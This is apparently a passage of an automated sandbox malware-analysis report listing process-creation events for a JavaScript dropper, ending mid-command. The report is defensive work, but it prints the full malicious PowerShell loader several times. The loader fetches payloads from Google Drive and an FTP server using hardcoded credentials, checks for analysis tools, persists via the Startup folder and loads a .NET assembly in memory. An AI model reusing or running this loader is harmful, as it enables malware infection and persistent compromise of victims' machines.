Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B51D2A5 pushad ; iretd	5_2_00007FFD9B51D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B632315 pushad ; iretd	5_2_00007FFD9B63232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B6384DD push ebx; ret	5_2_00007FFD9B63851A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7015DD push eax; retf	5_2_00007FFD9B7015F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B54D2A5 pushad ; iretd	6_2_00007FFD9B54D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B661FE0 push esp; ret	6_2_00007FFD9B661FF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFD9B63528B push edx; iretd	20_2_00007FFD9B6355DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFD9B6355CB push edx; iretd	20_2_00007FFD9B6355DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFD9B650B9A push eax; retf	28_2_00007FFD9B650D4D

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += 